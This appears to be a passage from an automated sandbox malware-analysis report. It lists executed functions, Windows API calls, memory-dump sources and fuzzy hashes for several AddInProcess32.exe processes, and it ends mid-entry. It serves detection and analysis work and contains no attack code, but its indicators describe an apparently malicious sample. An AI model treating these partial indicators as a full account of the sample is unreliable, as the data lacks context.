Instruction Fuzzy Hash: 935177B09103498FDB18DFA9E588BDEBBF1EF49314F208069D149A7260D7349988CF65

Function 01797AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01797B4E
GetCurrentThread.KERNEL32 ref: 01797B8B
GetCurrentProcess.KERNEL32 ref: 01797BC8
GetCurrentThreadId.KERNEL32 ref: 01797C21

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c435425df13c2adf48dc25b39fd6b41b8a6256516d40b54b97b1796733da81ef
Instruction ID: 67d1a2fe5aa1041e0ea51c907b5e3ed3d79aa3ea35ab3942021c2c63e9c06110
Opcode Fuzzy Hash: c435425df13c2adf48dc25b39fd6b41b8a6256516d40b54b97b1796733da81ef
Instruction Fuzzy Hash: 315165B09002498FDB18DFAAE548BDEFBF1EF48314F208469E119A7360DB349984CF65

Function 01791F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017933F1

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ad5d038b23bd270699ccac5bfb9674253ea50bcb76ce80ebf59eb743c9853ec9
Instruction ID: 3dbf710a6832d86c0b5a0dac0ee291969e3b5b580418df5a36fe0551233adfa9
Opcode Fuzzy Hash: ad5d038b23bd270699ccac5bfb9674253ea50bcb76ce80ebf59eb743c9853ec9
Instruction Fuzzy Hash: 4A41CEB0C00619CFDB24CFA9D844BDEBBB5BF49304F2480AAD408AB265DB756949CF91

Function 01793337 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 017933F1

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 484997a4150da4ee3d66d91aea3225fbc5e50dade5f0c6ec42dbfd5b5a3121b0
Instruction ID: ad955076246b3f6cea5a4994da0f128969ead2e01d5d5568193bf107ce9ee026
Opcode Fuzzy Hash: 484997a4150da4ee3d66d91aea3225fbc5e50dade5f0c6ec42dbfd5b5a3121b0
Instruction Fuzzy Hash: 9441FFB0C00619CFDB24CFA9D844BDEFBB5BF49304F24806AD409AB265DB75694ACF91

Function 01798118 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017981A7

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5e5837c00f75db6c90ee8beca183543f4bd876d3eb1451e344663dffdb272781
Instruction ID: 3c12ffdecce4bbaa4216b0af26903d19340e2167b33f424c70b222a10163efa5
Opcode Fuzzy Hash: 5e5837c00f75db6c90ee8beca183543f4bd876d3eb1451e344663dffdb272781
Instruction Fuzzy Hash: 6F21C6B5D00259AFDB10CF9AD984ADEFFF8EB48310F14841AE958A7350D378A944CFA5

Function 01798120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017981A7

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 32f575dafb84c4db2d9d836a1ced1b396af2203738f48627895581e74bf26834
Instruction ID: 868f83cad51a0ca3bbd71c297b0a106ae92faaa1dcdf5236a8356824c2e8adf4
Opcode Fuzzy Hash: 32f575dafb84c4db2d9d836a1ced1b396af2203738f48627895581e74bf26834
Instruction Fuzzy Hash: 5521C2B59002599FDB10CFAAD984ADEFFF8EB48320F14841AE958A7350D374A944CFA5

Function 01798B40 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 01798B9D

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6a7a5e9486583157ccaf541757b28669961f66a543ed3b4c4bbdbec192ff3a2d
Instruction ID: 0ba154e944a03e97d36b67388a86fe4d516612ef77488183f446677a9fd703a4
Opcode Fuzzy Hash: 6a7a5e9486583157ccaf541757b28669961f66a543ed3b4c4bbdbec192ff3a2d
Instruction Fuzzy Hash: 511122B59002499FCB20DFAAE485BCEFBF8EB49324F248459D518A7310D335A944CFA6

Function 01798010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 01798B9D

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 382668f4e71043838219da3b4c0dfe72f6ea623ba6ebbd2ade1f3a884d87afc8
Instruction ID: 7800b6d295e6ac89049ec57b8e919d6feaa933e5abc1e33424a351975e389b2e
Opcode Fuzzy Hash: 382668f4e71043838219da3b4c0dfe72f6ea623ba6ebbd2ade1f3a884d87afc8
Instruction Fuzzy Hash: 831100B59003488FCB20DF9AE549BDEFBF8EB48324F24846AD559A7310C375A944CFA5

Function 01798B9B Relevance: 1.5, APIs: 1, Instructions: 20
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 01798B9D

Memory Dump Source

Source File: 00000007.00000002.1852037279.0000000001790000.00000040.00000800.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1790000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: b0330ac95264833217efbcd91afa66e934d0d05b6839224a00abb1d15ce728c3
Instruction ID: 11559e616f21aca16c67122451c1c0e0e723b3c42c07112814a37b55853f76cd
Opcode Fuzzy Hash: b0330ac95264833217efbcd91afa66e934d0d05b6839224a00abb1d15ce728c3
Instruction Fuzzy Hash: 97E08C729003048EDF20ABADE4083CDFBE09F85324F28849AC159D7221C6799588CB91

Function 016FD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1851358881.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16fd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451d4af4b276ce4e13e375a84d5882de2018f569d3d64a30b8106d77b5cf13a1
Instruction ID: 209913353d58c563663698ff03235ac47a8ccf4415f342c703b0dc7d1af543e4
Opcode Fuzzy Hash: 451d4af4b276ce4e13e375a84d5882de2018f569d3d64a30b8106d77b5cf13a1
Instruction Fuzzy Hash: 84212571504204DFDB05DF98DDC8B2ABFA5FB88318F20C16DEA094B356C336E456CAA2

Function 016FD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1851358881.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16fd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ab27219482608ce58d365e9e5a37e719f4bf5ef931d2964013fa43f5fb31214e
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 0311AF76504240DFDB16CF54D9C4B16BF71FB94318F24C6ADD9090B256C33AE45ACBA2

Analysis Process: AddInProcess32.exePID: 7624, Parent PID: 7500COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	42
Total number of Limit Nodes:	6

Executed Functions

Function 01217AA8 Relevance: 6.1, APIs: 4, Instructions: 143
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01217B4E
GetCurrentThread.KERNEL32 ref: 01217B8B
GetCurrentProcess.KERNEL32 ref: 01217BC8
GetCurrentThreadId.KERNEL32 ref: 01217C21

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cf6ddb4378df66965dbceb60864e9a80cb44f8e879ff7a9f3227d26ffe852de2
Instruction ID: 5cbea05a331369fed5e95336f04bbdb82889220e8925fae56c8a5be16576376d
Opcode Fuzzy Hash: cf6ddb4378df66965dbceb60864e9a80cb44f8e879ff7a9f3227d26ffe852de2
Instruction Fuzzy Hash: 9C5185B09002498FDB18DFA9D548BDEBFF1EF88304F20845AE158A7261D7349989CF65

Function 01217AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 01217B4E
GetCurrentThread.KERNEL32 ref: 01217B8B
GetCurrentProcess.KERNEL32 ref: 01217BC8
GetCurrentThreadId.KERNEL32 ref: 01217C21

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 75c6c6bf5dbc0a627f1a073cd956d54363690d7b77f550fb6533e24a21083ed9
Instruction ID: 51d5efbb8962a290cdbe19a45f5ed4c059b4a98935c8874de21c0d8d24b20a84
Opcode Fuzzy Hash: 75c6c6bf5dbc0a627f1a073cd956d54363690d7b77f550fb6533e24a21083ed9
Instruction Fuzzy Hash: D95155B09103498FDB18DFAAD548B9EBBF1FF88314F208459E119A7364DB34A984CF65

Function 01211F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012133F1

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 16f3d39bfb0c1a66cf59dcf3d5a5225e6eb42d93cefc402a75bb7b307e3acce0
Instruction ID: 6c1a166ecdf4d37b1407e535664df0075fa64154b4fa29e174db8b73ad8393ab
Opcode Fuzzy Hash: 16f3d39bfb0c1a66cf59dcf3d5a5225e6eb42d93cefc402a75bb7b307e3acce0
Instruction Fuzzy Hash: C341DFB0C1061DCBDB24CFAAC844B9EBBF6FF49314F24806AD508AB255DBB56945CF90

Function 01213336 Relevance: 1.6, APIs: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012133F1

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 043305435b5c87ef6d6a9fda86b4d69aed7be15313107f18357967904e5608e3
Instruction ID: 0af9fc3f05344c5cfbbb2d4a1845298083bd35c5fe671f9862fab94508d346bf
Opcode Fuzzy Hash: 043305435b5c87ef6d6a9fda86b4d69aed7be15313107f18357967904e5608e3
Instruction Fuzzy Hash: 7B41E0B0C10619CFDB24CFA9C844B9EBBF6FF49314F24806AD508AB255DBB56945CF90

Function 01218118 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012181A7

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 40bd8fed0b0133b1dc06095ac915b5b839d75fcfb57c86dc94070e73437d6926
Instruction ID: abfb6f0c52ea915f6231af5d4d1aa05bfa66684e2ed5e04712405630cb8704ce
Opcode Fuzzy Hash: 40bd8fed0b0133b1dc06095ac915b5b839d75fcfb57c86dc94070e73437d6926
Instruction Fuzzy Hash: 0A2112B5D002599FDB10CFAAD884AEEBFF5EB48320F14841AE958A3351C375A941CFA0

Function 01218120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012181A7

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 17d1e6a7b2a9b2584fe557fb4f6e160505b8e528d4c7c0cc5d8371ddfd446bdf
Instruction ID: cd78b8794d0bddead5bccb1fb18445e27ae30fdf0acc3766971809894ab41e13
Opcode Fuzzy Hash: 17d1e6a7b2a9b2584fe557fb4f6e160505b8e528d4c7c0cc5d8371ddfd446bdf
Instruction Fuzzy Hash: 5721E4B59002589FDB10CFAAD984ADEBFF5EB48320F14841AE918A3310C374A940CFA5

Function 01218B40 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 01218B9D

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 541f2d301887e43c4502a6fafb8d65cf5fb4ccdbfb0d28de08a6640aff45276c
Instruction ID: 86e62babf083286f7fd33b0be8fec65636c6cc7f7e276dbb354812a2184f5b79
Opcode Fuzzy Hash: 541f2d301887e43c4502a6fafb8d65cf5fb4ccdbfb0d28de08a6640aff45276c
Instruction Fuzzy Hash: 321133B1D002499FCB20DFAAD585BCEBBF8EB48320F208459D518A7210D775A944CFA5

Function 01218010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 01218B9D

Memory Dump Source

Source File: 00000009.00000002.1852134071.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1210000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 28f6ad31fd8b34b54f617afffe6b62b67b7524e8578a01dd81c504bd633d3cda
Instruction ID: c0e0e9ab57035f2bd9307a3658d93196e23e6ac66eabce942645bdb1e45a7c93
Opcode Fuzzy Hash: 28f6ad31fd8b34b54f617afffe6b62b67b7524e8578a01dd81c504bd633d3cda
Instruction Fuzzy Hash: 631115B19103488FCB20DF9AD585BDEFBF4EB58320F108459E519A7310D374AA44CFA5

Function 00EDD4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1848701732.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_edd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54d46dfe6bc88e722931e7caf5bce75866bf7b968af1dbce2400fdd6a830845
Instruction ID: e84e441f316165012c0833160682ddf6e35caa88d19b24b46f1a07aff75724e6
Opcode Fuzzy Hash: a54d46dfe6bc88e722931e7caf5bce75866bf7b968af1dbce2400fdd6a830845
Instruction Fuzzy Hash: 25212571508204DFCB05DF14EDC0B26BFA5FB98328F20816AE9095B356C336D857CBA2

Function 00EDD4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1848701732.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_edd000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: e49cd83dbac313f87d7ec73ff074472c52ed196b2114ef166aa77b5d0588a42e
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2711D376504240DFCB16CF14E9C4B16BF71FB94328F24C6AAD9090B356C33AD85ACBA1

Analysis Process: AddInProcess32.exePID: 7760, Parent PID: 7540COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	44
Total number of Limit Nodes:	6

Executed Functions

Function 022A7AA8 Relevance: 6.1, APIs: 4, Instructions: 140
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 022A7B4E
GetCurrentThread.KERNEL32 ref: 022A7B8B
GetCurrentProcess.KERNEL32 ref: 022A7BC8
GetCurrentThreadId.KERNEL32 ref: 022A7C21

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f7e947a13d60ec0b03d65a3b567ece5feb512006405bb5d805b6f8e5d5c524a8
Instruction ID: 6c342a8dc488ef2243dd66d0244d79a1425379a7e89d89ca3b203e6904c5fb5e
Opcode Fuzzy Hash: f7e947a13d60ec0b03d65a3b567ece5feb512006405bb5d805b6f8e5d5c524a8
Instruction Fuzzy Hash: D85198B09113498FDB04DFA9D548BDEFBF1AF48304F2084A9D148AB2A1DB349844CF69

Function 022A7AD0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 022A7B4E
GetCurrentThread.KERNEL32 ref: 022A7B8B
GetCurrentProcess.KERNEL32 ref: 022A7BC8
GetCurrentThreadId.KERNEL32 ref: 022A7C21

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 46594c48da078bac82a7c27ae1579c550c4db4f4788f7c6d98a57a4f7fd8e725
Instruction ID: 924ddc8dfffe4b4cd579c47f23261e0a4f1a55674867b4377074c578c645d6dc
Opcode Fuzzy Hash: 46594c48da078bac82a7c27ae1579c550c4db4f4788f7c6d98a57a4f7fd8e725
Instruction Fuzzy Hash: 4F5156B09112098FDB44DFA9D548BDEFBF1AF48314F20C469E119A7360D734A944CF69

Function 022A8118 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022A81A7

Strings

W, xrefs: 022A811D

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID: W
API String ID: 3793708945-655174618
Opcode ID: 481c54ba40689824b769e70efac6e8b65df6e705682ea1548ac721dca45eb123
Instruction ID: 18a3915deb5b71774ae66bbf11e6517d7f4a84f1930036f812c605cfb8bbe7e1
Opcode Fuzzy Hash: 481c54ba40689824b769e70efac6e8b65df6e705682ea1548ac721dca45eb123
Instruction Fuzzy Hash: 9721E0B5D00219DFDB10CFAAD984ADEFBF4EB48320F14845AE958A7260D374A944CF65

Function 022A3337 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 022A33F1

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a9fa0b00570700e894bd79ffb48dcb1e215fc421f1e36ba3fbec9bb0d6cccf3b
Instruction ID: 0aecbe47ee654b9fa60f3d12962f60169a5d45771ccc621fca408eaefeeb7111
Opcode Fuzzy Hash: a9fa0b00570700e894bd79ffb48dcb1e215fc421f1e36ba3fbec9bb0d6cccf3b
Instruction Fuzzy Hash: 6041F4B0C10619CFDB24CFA9C8947DEFBB5BF49304F2080AAD409AB255DB755946CF90

Function 022A1F0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 022A33F1

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ace2e118ea3d29f64d82854eb4705820774fc1daaab37ab29751f58764577e22
Instruction ID: 51984ad1d8ab4353d0d2ced81bb95684a0fd8d0ac8a0596b511025bc4ccf0779
Opcode Fuzzy Hash: ace2e118ea3d29f64d82854eb4705820774fc1daaab37ab29751f58764577e22
Instruction Fuzzy Hash: 8241FFB0C10719CBDB24CFA9C844B8EFBF5BF49304F2080AAD408AB255DBB56945CF90

Function 022A8120 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022A81A7

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fdc6fc3599386dfa1e60e1a141d4762ed83806f16b4dc25313caddd2b6526621
Instruction ID: 442b71071d9114b00d4f1f75b87be180cf4a85698ede2e79683bd257360ecd80
Opcode Fuzzy Hash: fdc6fc3599386dfa1e60e1a141d4762ed83806f16b4dc25313caddd2b6526621
Instruction Fuzzy Hash: 5721C2B59002599FDB10CFAAD984ADEFFF8EB48320F14841AE958A7350D374A944CFA5

Function 022A8010 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 022A8B9D

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6cbf72280fec8f0bab91f84d6140d9244b8c63cf2866eb419affd1a849eec8ba
Instruction ID: a249916c883a1e3695f2d1740bce19d5573a7294d0a748242775f68cf92823a2
Opcode Fuzzy Hash: 6cbf72280fec8f0bab91f84d6140d9244b8c63cf2866eb419affd1a849eec8ba
Instruction Fuzzy Hash: CD1142B09103488FCB20DF9AD548BDEFBF8EB48320F208869D518A7310C374A940CFA5

Function 022A8B40 Relevance: 1.5, APIs: 1, Instructions: 44
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 022A8B9D

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6ee43b2da1d06ec9c932ead28c3e5d7fc9b6b61201e3bdce5c3498ac77abab15
Instruction ID: 966c2a536bb3a6f521ee56648d0200c2b2d841a4e4e86657033fc5b065e0ba71
Opcode Fuzzy Hash: 6ee43b2da1d06ec9c932ead28c3e5d7fc9b6b61201e3bdce5c3498ac77abab15
Instruction Fuzzy Hash: 331142B5900349CFDB10DFA9D545BDEBBF4EB48324F20886AD558A7250D334A544CFA5

Function 022A9FB8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 022AA010

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 81f212f6001558d4e0fd52a854287445e1978234347b743a88970e30817ac96f
Instruction ID: 93c1180e2a652ad5004933aeebf616f0de1c2074be867912d2fbc807bb73d9f0
Opcode Fuzzy Hash: 81f212f6001558d4e0fd52a854287445e1978234347b743a88970e30817ac96f
Instruction Fuzzy Hash: 861122B18002498FCB20DF9AC545BDEBBF4EF48320F10842AD558A7240D738A944CFA5

Function 022A9FB2 Relevance: 1.3, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 022AA010

Memory Dump Source

Source File: 0000000A.00000002.1925892018.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_22a0000_AddInProcess32.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6f1e07f3588058d6da505b3ae27546cf00f0cae478a79a7ff88a944cb830856d
Instruction ID: 01556466414a7ebdb41457e07e78c6d71d42f44b89227c8486d3f2b67b8659fd
Opcode Fuzzy Hash: 6f1e07f3588058d6da505b3ae27546cf00f0cae478a79a7ff88a944cb830856d
Instruction Fuzzy Hash: E51152B5800349CFCB20CF99D1457EEBBF0EF48320F14882AD998A7640D738A984CFA5

Function 0090D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1924422977.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_90d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
